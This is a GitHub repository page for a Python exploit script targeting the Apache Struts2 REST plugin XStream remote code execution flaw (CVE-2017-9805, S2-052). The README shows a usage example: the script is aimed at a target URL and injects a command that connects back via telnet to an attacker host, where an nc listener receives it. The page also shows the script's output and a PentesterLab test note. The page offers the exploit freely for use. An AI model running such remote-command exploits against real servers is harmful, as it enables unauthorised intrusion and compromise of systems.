Skip to content

ykankaya/-CVE-2017-9805

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits

README.md

README.md

 
 

s2-052.py

s2-052.py

 
 

Repository files navigation

Vulnerability information

Resources: * https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9805

What is this?

A python exploit script capable of executing remote commands into the shell of a system hosting a Struts2 vulnerable to S2-052.

Usage

╭─root@blackshell ~/
╰─# python s2-052.py --target 'http://192.168.0.233/orders/3' --command "echo pwned | telnet 192.168.0.122 1234"

[*] Apache Struts XStream REST vulnerability - S2-052
[*] Creating payload ...
[*] Exploit packet has 2582 bytes.
[*] Sending exploit packet ...
[+] Exploit packet has been sent.

╭─zc00l@blackshell ~/
╰─$ nc -lvp 1234

listening on [any] 1234 ...
connect to [192.168.0.122] from vulnerable.lan [192.168.0.233] 55791
pwned

Tested on pentesterlab vulnerable machine of exercise s2-052.

Author rights

This exploit script was written by me (zc00l) and can be used by anyone.

In case you want to use or modify this script, please give the rightful credits for any work already done.

About

Exploit script for Apache Struts2 REST Plugin XStream RCE (‎CVE-2017-9805)

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages

  • Python 100.0%